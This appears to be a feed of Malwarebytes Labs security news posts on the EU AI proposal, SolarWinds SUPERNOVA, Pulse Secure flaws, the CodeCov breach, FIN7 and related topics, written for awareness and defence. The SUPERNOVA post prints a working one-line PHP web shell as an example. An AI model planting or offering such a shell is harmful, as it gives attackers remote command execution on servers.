IT NEWS

This week on Lock and Code, we speak to Malwarebytes Chief Information Security Officer John Donovan about the flaws in using VirusTotal as the one source of truth when evaluating whether or not a cybersecurity tool actually works. It’s a practice that is surprisingly common.

Weeks ago, Malwarebytes Labs released the SMB Cybersecurity Trust & Confidence Report, which revealed that the majority of small- to medium-sized businesses that we surveyed were taking proactive measures to test whether their endpoint protection was catching all the right—or wrong—stuff. We found that of those who did evaluate their endpoint protection tools, a hefty 58 percent did so strictly by using VirusTotal.

Now, VirusTotal is a massive online resource that countless cybersecurity researchers likely rely on every day. But it shouldn’t be the only tool that security teams rely on, because VirusTotal has some gaps. In fact, all the evaluation methods that respondents told us about in our survey are far from perfect, and they might lead to uninformed conclusions.

If endpoint detection tools are supposed to stop an attack before it happens, what good is evaluating it with an incomplete tool? It puts too much at risk. And that isn’t even mentioning the potential privacy threats involved.

“If you get a file that says ‘This looks like there’s a virus in it,’ be careful with what you’re uploading,” Donovan said. “If you take something that is a confidential memo that flagged your antivirus, you may want to figure out how to look at that somewhere differently rather than putting that up in VirusTotal”

Tune in to learn about the smartest ways to test and implement endpoint protection into your small- to medium-sized business, and how to finally break free from the VirusTotal silo, on the latest episode of Lock and Code, with host David Ruiz.

You can also find us on Apple Podcasts, Spotify, and Google Podcasts, plus whatever preferred podcast platform you use.

The post Breaking free from the VirusTotal silo: Lock and Code S02E07 appeared first on Malwarebytes Labs.

A written proposal to ban several uses of artificial intelligence (AI) and to place new oversight on other “high-risk” AI applications—published by the European Commission this week—met fierce opposition from several digital rights advocates in Europe.

Portrayed as a missed opportunity by privacy experts, the EU Commission’s proposal bans four broad applications of AI, but it includes several loopholes that could lead to abuse, and it fails to include a mechanism to add other AI applications to the ban list. It deems certain types of AI applications as “high-risk”—meaning their developers will need to abide by certain restrictions—but some of those same applications were specifically called out by many digital rights groups earlier this year as “incompatible with a democratic society.” It creates new government authorities, but the responsibilities of those authorities may overlap with separate authorities devoted to overall data protection.

Most upsetting to digital rights experts, it appears, is that the 107-page document (not including the necessary annexes) offers only glancing restrictions on biometric surveillance, like facial recognition software.

“The EU’s proposal falls far short of what is needed to mitigate the vast abuse potential of technologies like facial recognition systems,” said Rasha Abdul Rahim, Director of Amnesty Tech for Amnesty International. “Under the proposed ban, police will still be able to use non-live facial recognition software with CCTV cameras to track our every move, scraping images from social media accounts without people’s consent.”

AI bans

Released on April 21, the AI ban proposal is the product of years of work, dating back to 2018, when the European Commission and the European Union’s Member States agreed to draft AI policies and regulations. According to the European Commission, the plan is meant to not just place restrictions on certain AI uses, but to also allow for innovation and competition in AI development.

“The global leadership of Europe in adopting the latest technologies, seizing the benefits and promoting the development of human-centric, sustainable, secure, inclusive and trustworthy artificial intelligence (AI) depends on the ability of the European Union (EU) to accelerate, act and align AI policy priorities and investments,” the European Commission wrote in its Coordinated Plan on Artificial Intelligence.

The proposal includes a few core segments.

The proposal would ban, with some exceptions, four broad uses of AI. Two of those banned uses include the use of AI to distort a person’s behavior in a way that could cause harm to that person or another person; one of those two areas focuses on the use of AI to exploit a person or group’s “age, physical or mental disability.”

The proposal’s third ban targets the use of AI to create so-called social credit scores that could result in unjust treatment, a concern that lies somewhere between the haphazard systems implemented in some regions of China and the dystopic anthology series Black Mirror.

According to the proposal, the use of AI to evaluate or classify the “trustworthiness” of a person would not be allowed if those evaluations led to detrimental or unfavorable treatment in “social contexts which are unrelated to the contexts in which the data was originally generated or collected,” or treatment that is “unjustified or disproportionate to their social behavior or its gravity.”

The proposal’s final AI ban would be against “’real-time’ remote biometric identification systems in publicly accessible spaces for the purpose of law enforcement,” which means police could not use tools like facial recognition in real-time at public events, with some exceptions.

Those exceptions include the “targeted search” for “specific” potential victims of crime, including missing children, and the prevention of “specific, substantial, and imminent threat to the life or physical safety of natural persons, or of a terrorist attack.” Law enforcement could also use real-time facial recognition tools to detect, locate, identify, or prosecute a “perpetrator or suspect” of a crime of a certain severity.

According to Matthew Mahmoudi, a researcher and adviser for Amnesty Tech, these exceptions are too broad, as they could still allow for many abuses against certain communities. For instance, the exception that would allow for real-time facial recognition to be used “on people suspected of illegally entering or living in a EU member state… will undoubtedly be weaponised against migrants and refugees,” Mahmoudi said.

Aside from the proposal’s exceptions, it is the bans themselves that appear quite limited when compared to what is happening in the real world today.

As an example, the proposal does not ban post-fact facial recognition by law enforcement, in which officers could collect video imagery after a public event and run facial recognition software on that video from the comfort of their stations. Though the EU Commission’s proposal of course applies to Europe, this type of practice is already rampant within the United States, where police departments have lapped up the offerings of Clearview AI, the facial recognition company with an origin story that includes coordination with far-right extremists.

The problem is severe. As uncovered in a Buzzfeed investigation this year:

“According to reporting and data reviewed by BuzzFeed News, more than 7,000 individuals from nearly 2,000 public agencies nationwide have used Clearview AI to search through millions of Americans’ faces, looking for people, including Black Lives Matter protesters, Capitol insurrectionists, petty criminals, and their own friends and family members.”

Buzzfeed found similar police activity in Australia last year, and on the very same day that the EU Commission released its proposal, Malwarebytes Labs covered a story about the FBI using facial recognition to identify a rioter at the US Capitol on January 6.

This type of activity is thriving across the world. Digital rights experts believe now is the best chance the world has to stamp it out.

But what isn’t banned by the proposal isn’t necessarily unrestricted. In fact, the proposal simply creates new restrictions based on other types of activities it deems “high-risk.”

High-risk AI and oversight

The next segment of the proposal places restrictions on “high-risk” AI applications. These uses of AI would not be banned outright but would instead be subject to certain oversight and compliance, much of which would be performed by the AI’s developers.

According to the proposal, “high-risk” AI would fall into the following eight, broad categories:

• Biometric identification and categorization of natural persons
• Management and operation of critical infrastructure
• Education and vocational training
• Employment, workers management, and access to self-employment
• Access to and enjoyment of essential private services and public services and benefits
• Law enforcement
• Migration, asylum, and border control management
• Administration of justice and democratic processes

The proposal clarifies which types of AI applications would be considered high-risk in each of the given categories. For instance, not every single type of AI used in education and vocational training would be considered high-risk, but those that do qualify would be systems “intended to be used for the purpose of determining access or assigning natural persons to educational and vocational training institutions.” Similarly, AI systems used for employment recruiting—particularly those used to advertise open positions, screen applications, and evaluate candidates—would be classified as high-risk under the broader category of AI for employment, workers management, and access to self-employment.

Here, again, the proposal angered privacy experts.

In January of this year, 61 civil rights groups sent an open letter to the European Commission, asking that certain applications of AI be considered “red lines” that should not be crossed. The groups, which included Access Now, Electronic Privacy Information Center, and Privacy International, wrote to “call attention to specific (but non-exhaustive) examples of uses that are incompatible with a democratic society and must be prohibited or legally restricted in the AI legislation.”

Of the five areas called out as too dangerous to permit, at least three are considered as “high-risk” by the European Commission’s proposal, including the use of AI for migration management, for criminal justice, and for pre-predictive policing.

The problem, according to the group Access Now, is that the proposal’s current restrictions for high-risk AI would do little to actually protect people who are subject to those high-risk systems.

Per the proposal, developers of these high-risk AI systems would need to comply with several self-imposed rules. They would need to establish and implement a “risk management system” that identifies foreseeable risks. They would need to draft up and keep up to date their “technical documentation.” They would need to design their systems to implement automatic record-keeping, ensure transparency, and allow for human oversight.

According to the European Digital Rights (EDRi) association, these rules put too much burden on the developers of the tools themselves.

“The majority of requirements in the proposal naively rely on AI developers to implement technical solutions to complex social issues, which are likely self-assessed by the companies themselves,” the group wrote. “In this way, the proposal enables a profitable market of unjust AI to be used for surveillance and discrimination, and pins the blame on the technology developers, instead of the institutions or companies putting the systems to use.”

Finally, the proposal would place some oversight and regulation duties into the hands of the government, including the creation of an “EU database” that contains information about high-risk AI systems, the creation of a European Artificial intelligence Board, and the designation of a “national supervisory authority” for each EU Member State.

This, too, has brought pushback, as the regulatory bodies could overlap in responsibility with the European Data Protection Board and the Data Protection Authorities already designated by each EU Member State, per the changes implemented by the General Data Protection Regulation.

What next?

Though AI technology races ahead, the EU Commission’s proposal will likely take years to implement, as it still needs to be approved by the Council of the European Union and the European Parliament to become law.

Throughout that process, there are sure to be many changes, updates, and refinements. Hopefully, they’re for the better.

The post Artificial Intelligence ban slammed for failing to address “vast abuse potential” appeared first on Malwarebytes Labs.

The Cybersecurity and Infrastructure Security Agency (CISA) has reported finding the SUPERNOVA web shell collecting credentials on a SolarWinds Orion server. These observations were made during an incident response to an Advanced Persistent Threat (APT) actor’s year-long compromise of an enterprise network. In its analysis, the organization warns that this threat actor behind the compromise “targeted multiple entities in the same period”.

NOT part of the SolarWinds attack

The SUPERNOVA web shell is placed by an attacker directly on a system that hosts SolarWinds Orion and is designed to appear as part of the SolarWinds Orion monitoring product. So, SUPERNOVA is placed by a lateral movement inside a network and not considered as a part of the SolarWinds supply chain attack. The threat actors are believed to be different from the ones behind the infamous supply chain attack.

Pulse Secure VPN

CISA found that the attacker(s) had access to the enterprise’s network for nearly a year, between March 2020 and February 2021. According to its investigation, the threat actor connected to the entity’s network via a Pulse Secure Virtual Private Network (VPN) appliance. CISA reports that it “does not know how the threat actor initially obtained these credentials” but, by coincidence, just two days ago we detailed multiple Pulse Secure vulnerabilities that are being actively exploited in the wild, and which could leverage such an attack.

The attacker(s) authenticated to the VPN appliance through several user accounts that did not have multi-factor authentication (MFA) enabled and were able to masquerade as legitimate teleworking employees.

From there they moved laterally to its SolarWinds Orion server to establish a backdoor that would allow them to persist, so they could connect even if their initial point of entry was closed.

Web shells

Web shells are usually small scripts that act as a backdoor or a first point of entry for an attacker. A minimal web shell can be as simple as this:

<?=`$_GET[1]`?>

A shell like this will site on a compromised server and simply execute whatever command an attacker sends it via a web URL. The SUPERNOVA web shell is more sophisticated, and written in .NET rather than PHP, but it is essentially no different.

It is initially installed by a PowerShell script and hides in a malicious version of the SolarWinds Orion Web Application module. It enables remote injection of C# source code into a web portal provided by the SolarWinds software suite. The injected code is compiled and directly executed in memory.

Harvesting credentials

The goal of the operation looks to have been to gather even more credentials. CISA reports that the threat actor was able to dump credentials from the SolarWinds appliance via two methods:

• Cached credentials used by the SolarWinds appliance server and network monitoring.
• By dumping Local Security Authority Subsystem Service (LSASS) memory.

The cached credentials are normally protected by encryption unless they are marked as exportable. So, either the threat actor was able to change or bypass that property, or the victim mistakenly marked the private key certificate as exportable.

The attacker put a renamed copy of procdump.exe on the SolarWinds Orion server to dump the LSASS memory. The credentials were then dumped into a text file and exfiltrated by an HTTP request.

CVE-2020-10148

Publicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). CISA believes that a vulnerability listed as CVE-2020-10148 was used to bypass the authentication to the SolarWinds appliance.

The SolarWinds Orion API is vulnerable to an authentication bypass that could allow a remote attacker to execute API commands. This vulnerability could allow a remote attacker to bypass authentication and execute API commands which may result in a compromise of the SolarWinds instance. SolarWinds Orion Platform versions 2019.4 HF 5, 2020.2 with no hotfix installed, and 2020.2 HF 1 are affected.

Bypassing the authentication would have enabled them to run commands with the same privileges the SolarWinds appliance was running, which was SYSTEM in this case.

Recommendations

Based on findings done during the ongoing investigation CISA recommends all organizations implement the following practices to strengthen the security posture of their organization’s systems:

• Check for common executables executing with the hash of another process
• Implement MFA, especially for privileged accounts.
• Use separate administrative accounts on separate administration workstations.
• Implement Local Administrator Password Solution (LAPS).
• Implement the principle of least privilege on data access.
• Secure Remote Desktop Protocol (RDP) and other remote access solutions using MFA and “jump boxes” for access.
• Deploy and maintain endpoint defense tools on all endpoints.
• Ensure all software is up to date.
• Maintain up-to-date antivirus signatures and engines.
• Restrict users’ ability (permissions) to install and run unwanted software applications. Do not add users to the local administrators’ group unless required.
• Enforce a strong password policy and implement regular password changes.
• Enable a personal firewall on organization workstations that is configured to deny unsolicited connection requests.
• Disable unnecessary services on organization workstations and servers.

It also urges users of SolarWinds Orion versions 2019.4 through 2020.2.1 HF1 to to review Emergency Directive ED 21-01 and associated guidance for recommendations on operating the SolarWinds Orion platform. US federal agencies are required to comply with these directives.

Stay safe, everyone!

The post SUPERNOVA malware discovered on SolarWinds Orion server appeared first on Malwarebytes Labs.

If you’ve been shopping for a VPN service in 2021, you’ve probably noticed how many providers are available. Using a personal VPN has grown in popularity in recent years, and for good reason. You may no longer be asking, “Should I use one,” but rather, “Which one should I choose?”

The answer might be different for different people. There are many features and providers to consider. Here, we guide you through some of the decision factors so you can select the best VPN for your needs.

Is a free VPN the best choice?

One of the first questions VPN shoppers might ask is whether to use a free VPN service or pay for one. If you’re familiar with what a VPN is, you probably know that there are costs associated with being a provider. A VPN is like a middleman for your Internet traffic, and just like you probably pay an Internet Service Provider for your home Internet, a VPN provider somehow has to cover the costs of their service.

You might compare free vs paid VPNs to free vs paid Internet access. For home Internet access, an Internet Service Provider maintains the infrastructure to deliver Internet to homes, and charges customers for it. If you go to a café and use their free WiFi, the café pays for the WiFi and might build that cost into how much they charge you for a cup of coffee. So, how would a free VPN provider build their costs into a free service?

A common way free VPN services cover their costs is through advertising. That might be showing you ads when you use the service, or by taking your Internet activity data (as well as their other customers’ data) and selling that to advertisers as marketing data. Given that one of the main reasons to use a VPN is to increase your online privacy, it seems that using a free VPN that covers its costs by using your Internet activity for advertising might not accomplish that goal.

If you decide you want to use a paid VPN service for your online privacy but you’re not ready to commit to a long-term subscription right away, many providers offer a free trial before you have to make that commitment.

Choosing a VPN for gaming, streaming, or torrenting

One of the key decision factors in choosing a VPN is what you plan to use it for. In your research, you’ll likely explore reviews to help narrow down your selection, and one of the best ways to make your choice is to take advantage of free trials, so you can take the VPN for a test drive, so to speak. 

The best VPN for you might not be the best one for someone else. Online privacy is the main concern for most VPN users, but if you intend to use one while gaming, watching streaming services based in other countries, or for torrenting, you will have other considerations too and might choose a different provider in each case.

Best VPN for gaming

Many avid gamers have not wanted to use a VPN while gaming due to increased lag caused by encrypting traffic and routing it through a VPN server. However, many VPNs have gotten faster and more efficient, and “gaming VPN” is less of an oxymoron than it used to be. In addition to the online privacy benefits, gamers may also be keen to hide their IP addresses due to threats like doxing and swatting.

Alternatively, some users don’t want to use a VPN for gaming, but do want to use a VPN for everything else other than gaming. In that case, they will want to pay attention to how easily and transparently they can do this. Do they have to do one thing at a time and remember to turn the VPN on and off as they need it, or can they keep their VPN on all the time while allowing games to bypass it?

If you’re a gamer searching for the best VPN specifically for gaming, take advantage of free trials, and test out your selections while gaming to see how they impact speed and performance. 

Best VPN for streaming

Most VPN services enable you to select a server in the country of your choice, and this can enable you to watch some streaming services as if you were located in that country. However, some streaming services have cracked down on this practice, and so not every VPN will enable you to watch the content you want. Testing out a VPN with the streaming services you want to watch is a good way to determine what works now, but keep in mind that your access may change as streaming services adapt. Before using a VPN to access a streaming service, be sure to check that doing so does not violate their terms and conditions.

Best VPN for torrenting

Torrenting is a form of peer-to-peer (P2P) file sharing. Torrent downloads are quick because they are drawn from multiple nearby peers instead of from a single faraway location. To get access to the network users must become peers and allow a small portion of their computer’s resources to be used for hosting torrent data. While sharing files with other users isn’t illegal in and of itself, torrenting is often associated with pirating copyrighted material. However, there is perfectly legal content that people torrent, such as classic movies, TED Talks, and content in indie or niche genres that might not be readily available on large streaming services.

Often for torrenting, connection speed is most important factor in choosing a VPN so you can start watching content quickly. Unlike gaming, where download performance is most important, torrent users will also care about upload performance. This is another example in which taking advantage of free trials to test out VPN speeds while torrenting can help you to pick the best VPN for this purpose.

VPN features

Once you’ve thought about how you plan to use a VPN, the final step to select the best one for your needs is to compare features. This includes:

• Ease of use: Is the interface easy to navigate and use?
• Connection speed: You can test this if you do a free trial of the services you’re considering, and look at VPN speed comparison tests.
• Server locations: In how many different countries are servers available?
• Data limits: Does the service provide unlimited data, or is there a cap?
• Simultaneous usage: How many devices can use your plan simultaneously?
• Operating systems: Can you use the same VPN service on Windows, Mac, Android, and iOS?
• VPN protocol: Do they use WireGuard, OpenVPN, or another protocol?
• Encryption: Does the VPN use 256-bit AES encryption, the current best-in-class standard? 
• Logging: Do they keep activity logs or have a no-log policy? What data gets logged?
• Kill switch: Do they offer a kill switch, to close your browsers or apps if the VPN disconnects unexpectedly?
• Split tunneling: Do you want to be able to do some online activities inside the encrypted VPN, and others (such as high-bandwidth activities) just on your regular Internet connection?
• Support: Is support available 24/7? Is it available via chat, email, phone?

What’s the best VPN for your needs? Different people will have different answers. Considering the available features and reasons you want to use a VPN service will help you to answer that question.

The post How to choose the best VPN for you appeared first on Malwarebytes Labs.

Pulse Secure has alerted customers to the existence of an exploitable chain of attack against its Pulse Connect Secure (PCS) appliances. PCS provides Virtual Private Network (VPN) facilities to businesses, which use them to prevent unauthorized access to their networks and services.

Cybersecurity sleuths Mandiant report that they are tracking “12 malware families associated with the exploitation of Pulse Secure VPN devices” operated by groups using a set of related techniques to bypass both single and multi-factor authentication. Most of the problems discovered by Pulse Secure and Mandiant involve three vulnerabilities that were patched in 2019 and 2020. But there is also a very serious new issue that it says impacts a very limited number of customers.

The old vulnerabilities

Publicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). The patched vulnerabilities are listed as:

• CVE-2019-11510 an unauthenticated remote attacker can send a specially crafted URI to perform an arbitrary file reading vulnerability. We wrote about the apparent reluctance to patch for this vulnerability in 2019.
• CVE-2020-8243 a vulnerability in the Pulse Connect Secure < 9.1R8.2 admin web interface could allow an authenticated attacker to upload a custom template to perform an arbitrary code execution.
• CVE-2020-8260 a vulnerability in the Pulse Connect Secure < 9.1R9 admin web interface could allow an authenticated attacker to perform an arbitrary code execution using uncontrolled gzip extraction.

The obvious advice here is to review the Pulse advisories for these vulnerabilities and follow the recommended guidance, which includes changing all passwords in the environments that are impacted.

The new vulnerability

The new vulnerability (CVE-2021-22893) is a Remote Code Execution (RCE) vulnerability with a CVSS score of 10—the maximum—and a Critical rating. According to the Pulse advisory:

[The vulnerability] includes an authentication by-pass vulnerability that can allow an unauthenticated user to perform remote arbitrary file execution on the Pulse Connect Secure gateway. This vulnerability has a critical CVSS score and poses a significant risk to your deployment.

There is no patch for it yet (it is expected to be patched in early May), so system administrators will need to mitigate for the problem for now, rather than simply fixing it. Please don’t wait for the patch.

Mitigation requires a workaround

According to Pulse Secure, until the patch is available CVE-2021-22893 can be mitigated by importing a workaround file. More details can be found in the company’s Security Advisory 44784. Reportedly, the workaround disables Pulse Collaboration, a feature that allows users to schedule and hold online meetings between both Connect Secure users and non-Connect Secure users. The workaround also disables the Windows File Share Browser that allows users to browse network file shares.

Targets

The Pulse Connect Secure vulnerabilities including CVE-2021-22893 have been used to target government, defense and financial organizations around the world, but mainly in the US. According to some articles the threat-actors are linked to China. The identified threat actors were found to be harvesting account credentials. Very likely in order to perform lateral movement within compromised organizations’ environments. They have also observed threat actors deploying modified Pulse Connect Secure files and scripts in order to maintain persistence. These modified scripts on the Pulse Secure system are reported to have allowed the malware to survive software updates and factory resets.

Threat analysis

FireEye’s Mandiant was involved in the research into these vulnerabilities. It has posted an elaborate analysis of the related malware, which they have dubbed SlowPulse. According to Mandiant, the malware and its variants are “applied as modifications to legitimate Pulse Secure files to bypass or log credentials in the authentication flows that exist within the legitimate Pulse Secure shared object libdsplibs.so”. In their blogpost they discuss 4 variants. Interested parties can also find technical details and detections there.

Networking devices

State sponsored cyber-attacks are often more about espionage than about monetary gain with the exception of sabotage against an enemy state. A big part of the espionage is getting hold of login credentials of those that have access to interesting secret information. Breaking into network devices in a way that can be used to extract login credential is an important strategy in this secret conflict. Keep in mind that attribution is always hard and tricky. You may end up reaching the conclusion they wanted you to reach. Given the targets and the methodology however, it makes sense in this case to look first at state sponsored threat actors.

The post Take action! Multiple Pulse Secure VPN vulnerabilities exploited in the wild appeared first on Malwarebytes Labs.

Facial recognition tech is in the news again after the FBI discovered the identify of one of the Capitol rioters by using facial recognition software on his girlfriend’s Instagram posts. It may sound scary and invasive, but in truth, what’s happening isn’t particularly new. In this case, we have what’s fast becoming a fairly standard tale of tracking people down via online imagery. Sometimes there’s cause for concern even without the latest tech providing some sort of flashpoint.

What’s happened?

After the Capitol riots following the US election, those responsible were slowly arrested over a period of weeks of searching and identifying. The Verge story mentions that in this effort, law enforcement made use of “facial recognition tools” to track down people associated with the event. The tool apparently brought researchers to the Instagram feed of a suspect’s girlfriend. It was a short step from there to matching his clothes with images from the Capitol riot.

Everything unravelled for the suspect quickly. Facebook accounts revealed his name. This brought investigators (via his state driving licence records) to his identity, workplace, and home.

Recognising recognition

We’ve covered facial recognition on the blog many times. Most concerns tend to focus on the potential for abuse from repressive Governments and law enforcement overreach. It’s such a concern that tech giants regularly dip in, and then quickly dip out when public opinion turns.

I don’t think many people will complain if facial recognition is used to help identify the people at the Capitol riots. Organisations find new ways to secure their sites with facial recognition and biometrics on a daily basis. You may or may not object to your bank combining facial recognition with AI software. These are potentially useful applications of this technology. Even so, we need to know what we’re dealing with for this story.

When pop culture and cold hard reality collide

Facial recognition is very much one of those technologies made a cliche for all time by film and television. The camera zooms in from orbit, it picks up the target in seconds, the operator is able to tell where the suspect bought his suit by enhancing the fibers on his jacket and so on.

The reality here is, “some people used a program to play mix and match with publicly available photographs”. The end result is still impressive, but CSI: Cyber this is not.

Impressive, but not CSI: Cyber

How does this work, then? Well, the article mentions “open source facial recognition tools”. The affidavit doesn’t say which tool, because law enforcement doesn’t want to give perpetrators clues for avoiding the long arm of the law. You can see some of the more popular tools available here, if you’re interested in learning more or giving them a go.

Otherwise, there are many other ways to match images with the raft of materials floating around online. TinEye is a dedicated online tool for matching images, and Google / Bing / Yandex search all offer their own versions of this functionality. A little bit of sleuthing and familiarity with OSINT practices can go a long way.

A sliding scale of “that’s impressive”

One of the best examples of this happened just recently, with a lost hiker pinpointed via a photograph. To me, this is significantly more impressive than digging a fairly distinctive individual out from a never-ending pile of selfies and readily available data on popular image sharing websites. As a result, I’d say this one is interesting, but definitely nothing new. Crowdsourcing also has a history of going horribly wrong, and the infamous Reddit Boston Bombing debacle is as good a place to drop this warning as any.

We’ll definitely see more of these stories in the near future, but I wouldn’t necessarily start panicking about this branch of open sourcing just yet.

The post FBI face recognition trawl finds Capitol rioter via his girlfriend’s Instagram appeared first on Malwarebytes Labs.

CodeCov, a company that creates software auditing tools for developers, was recently breached (the company says it was breached on April 1, and reported it on the April 15). According to investigators, this incident, in turn, gave attackers access to an unknown number of CodeCov’s clients’ networks.

One cannot help but think that this knock-on breach effect is a supply-chain attack, similar to what happened to SolarWinds and their clients.

As you may recall, in the SolarWinds attack multiple companies reported being breached by state-sponsored adversaries, following an attack on the IT company SolarWinds that resulted in undetected modifications to its products. Those affected included FireEye, which resulted in the theft of their Red Team assessment tools; Microsoft; and departments in the US Treasury and Commerce.

Like SolarWinds, this seems like another attempt to add malicious code to products supplied to other organizations, so as to compromise those organizations, and potentially the software products they supply too.

CodeCov said that its Bash Uploader script, used by clients to find and upload code coverage reports to CodeCov, had been initially tampered with at the end of January this year. This wouldn’t have been found out if a client hadn’t raised concerns on April 1. According to the company, attackers were able to gain access to and alter the script by exploiting an error in CodeCov’s Docker image creation process.

A security update post by CodeCov states:

Our investigation has determined that beginning January 31, 2021, there were periodic, unauthorized alterations of our Bash Uploader script by a third party, which enabled them to potentially export information stored in our users’ continuous integration (CI) environments. This information was then sent to a third-party server outside of Codecov’s infrastructure,”

Because the script is allowed to search through users’ code it potentially has access to any credentials stored with that code. This could have given the attackers access to systems inside CodeCov’s clients’ networks, and in turn, the code that those companies are developing and supplying to others. And because it is expected to upload data outside of the clients’ networks, the upload script also offered an easy exfiltration route for the stolen data.

According to Reuters, the CodeCov attackers rapidly copied and pasted credentials from compromised customers, via an automated script, and used an automated way of searching for other resources (it’s not clear if these are references to the bash upload script, which seems to fit that description, or some other tools). “The hackers put extra effort into using CodeCov to get inside other makers of software development programs, as well as companies that themselves provide many customers with technology services, including IBM,” Reuters also revealed in an interview with one of the investigators.

Reuters reports that IBM, Atlassian, and other clients of CodeCov have claimed that their code has not been altered, while not address issues on credentials. Hewlett Packard Enterprise, another CodeCov client, has yet to determine if they or any of their clients have been affected by this breach according to the news service.

CodeCov says the modified Bash Uploader could affect:

– Any credentials, tokens, or keys that our customers were passing through their [Continuous Integration] runner that would be accessible when the Bash Uploader script was executed.

– Any services, data stores, and application code that could be accessed with these credentials, tokens, or keys.

– The git remote information (URL of the origin repository) of repositories using the Bash Uploaders to upload coverage to Codecov in CI.

CodeCov has a list of recommended actions to take. This includes “all of their credentials, tokens, or keys located in the environment variables in their CI processes that used one of Codecov’s Bash Uploaders.” If you’re a CodeCov client, go here for more details. You will also find in there a list of actions they have taken in response to this breach.

The post CodeCov supply-chain compromise likened to SolarWinds attack appeared first on Malwarebytes Labs.

In 2018 three high-ranking members of a sophisticated international cybercrime group operating out of Eastern Europe were arrested and taken into custody by US authorities. Ukrainian nationals Dmytro Fedorov, Fedir Hladyr, and Andrii Kolpakov, were members of a prolific hacking group widely known as FIN7.

Hladyr is the systems administrator for the FIN7 hacking group, and is considered the mastermind behind the Carbanak campaign, a series of cyberattacks said to stolen as much as $900 million from banks in early part of the last decade. Last week Hladyr was sentenced in the Western District of Washington to 10 years in prison for his high-level role in FIN7.

The Carbanak campaign first made international headlines in 2015 as one of the first malware campaigns that specialized in remote ATM robberies. But FIN7 had already been active for a few years at that point and was involved in a lot more banking and financial malware than just the ATM machines manipulation.

The malware

Since 2013 FIN7 have attempted to attack banks, e-payment systems, and financial institutions using pieces of malware they designed, known as Carbanak and Cobalt. Carbanak is considered a further development of the Anunak malware campaign that targeted financial transfers and ATM networks of financial institutions around the world.

The campaigns all started with spear-phishing targeted at bank employees. When targets executed a malicious attachment the criminals were able to remotely control the victims’ infected machine. With access to a bank’s internal network, they were able to work their way internally until they gained control of the servers controlling ATMs.

A very detailed analysis of Anunak by Fox-IT and Group-IB can be found here (pdf).

By the following year, the same coders had improved the Anunak malware into a more sophisticated version, known as Carbanak. From then onwards, FIN7 focused its efforts on developing an even more sophisticated wave of attacks by using tailor-made malware based on the Cobalt Strike penetration testing software, but Carbanak remained part of their toolset.

In the US alone, FIN7 successfully breached the computer networks of companies in 47 states and the District of Columbia, stealing more than 15 million customer card records from over 6,500 individual point-of-sale terminals at more than 3,600 separate business locations.

Attribution

Many believe that the Carbanak malware was used by at least two separate entities. FIN7 and the Carbanak Group. This can be very confusing when trying to establish a timeline. Or when trying to solve any “whodunnit” mysteries. Once malware has been released and has proven to be successful you can count on other criminals trying to steal, copy, or rip off the code and techniques. So, if the Carbanak malware was used in a specific attack, it is not always clear which group was behind that attack, although it is clear that FIN7 was one of its users.

The arrest

The leader of the crime gang behind the Carbanak and Cobalt malware attacks was arrested in Alicante, Spain. The arrest was announced by Europol on 26 March 2018. According to Europol, the activities of the gang were believed to have resulted in losses of over EUR 1 billion for the financial industry.

Arresting the leader of that group did not stop the activities of the group though. The FIN7 campaigns appear to have continued, with the Hudson’s Bay Company breach using point-of-sale malware in April of 2018 being attributed to the group.

The arrest of Hladyr in August of 2018 at the request of the US Department of Justice, along with two other high-ranking members of the group did not have that effect either. In 2020 a cooperation between FIN7 and the Ryuk operators was suspected when the tools and techniques of FIN7, including the Carbanak Remote Administration Tool (RAT), were used to take over the network of an enterprise.

The conviction

After being extradited to the US in 2019, Hladyr pleaded guilty to one count of conspiracy to commit wire fraud and one count of conspiracy to commit computer hacking, in his role as the systems administrator of the FIN7 group.

According to acting US Attorney Tessa M. Gorman of the Western District of Washington:

This criminal organization had more than 70 people organized into business units and teams.  Some were hackers, others developed the malware installed on computers, and still others crafted the malicious emails that duped victims into infecting their company systems. This defendant worked at the intersection of all these activities and thus bears heavy responsibility for billions in damage caused to companies and individual consumers.

The Department of Justice says that Hladyr joined FIN7 via a front company called Combi Security but soon learned that it was a fake cybersecurity company with a phony website and no legitimate customers. It asserts that Hladyr served as FIN7’s systems administrator and played a central role in aggregating stolen payment card information, supervising FIN7’s hackers, and maintaining the servers used to attack and control victims’ computers. Hladyr also controlled the organization’s encrypted channels of communication.

The post FIN7 sysadmin behind “billions in damage” gets 10 years appeared first on Malwarebytes Labs.

Behind the scenes there are many people working in cyber-security that make the internet a safer place. Youssef Sammouda is one of these people. He has submitted at least a hundred reports to Facebook which have been resolved, making Facebook a safer platform along the way. Generally speaking, people may refer to this work as being a bug bounty hunter, but there is more to it than that.

Q: Tell us a little bit about your background

A: I’m 21 years old. I grew up in Tunisia. I always loved everything about computers from an early age. I started programming when I was 12 and my curiosity eventually led me to hacking. First I learned about “hacking”, techniques to get access to systems, how to escalate privileges, and how to achieve persistence. A better name than hacking is penetration testing. After that, I focused on web application security and learned a lot from forums and IRC chat rooms. Later, I heard about bug bounty hunting by coincidence and started doing it.

I can’t say much about my educational background since I dropped out of university due to my engagements in web applications development and my security assessments. I’d say that everything I learned to this day was from online content or books and not from educational institutions.

Q: How did you get interested in bug bounties?

A: Before bug bounties, it was difficult to test what you learned or sharpen your skills without being worried about getting noticed or caught when targeting websites or servers, since after all you’re doing something without the owner’s permission even if your intention is not to cause damage. So, the first benefit of bug bounty programs was the ability to responsibly apply or test what you’d learned about security, without worrying about legal actions by the website owners. Then of course, some of the programs introduced financial rewards which made it even better. You could start earning money at the same time as learning and doing what you love.

I became interested in the Facebook bug bounty program because it was beginner friendly. The scope was huge and it had the biggest rewards. My first bug in Facebook was a critical one and I found it in less than an hour, which encouraged me to dig more and learn about their infrastructure. After some time, I found myself knowing all the techniques to best enumerate their websites.

Q: Are there other security fields you are interested in?

A: I’ve always been fascinated by browser security and Operating System (OS) security. Reading proof-of-concept exploits of vulnerabilities found in browsers or applications has always been fun and an enjoyable thing to do, and I hope one day I can achieve the level of the researchers in these fields.

Q: Can you tell us something about how you find new bugs? And why you focus on Facebook?

A: I believe Facebook is running one of the best bug bounty programs out there. Sure, it has some problems and sometimes you get misunderstood by the security team, but if you compare it to other bug bounty programs, you’ll notice that Facebook is way better. Also, Facebook is very serious about its security. With time you notice that it’s getting harder to find bugs, which motivates me more, since I know others might be quitting and leaving me with a big scoop to dig out.

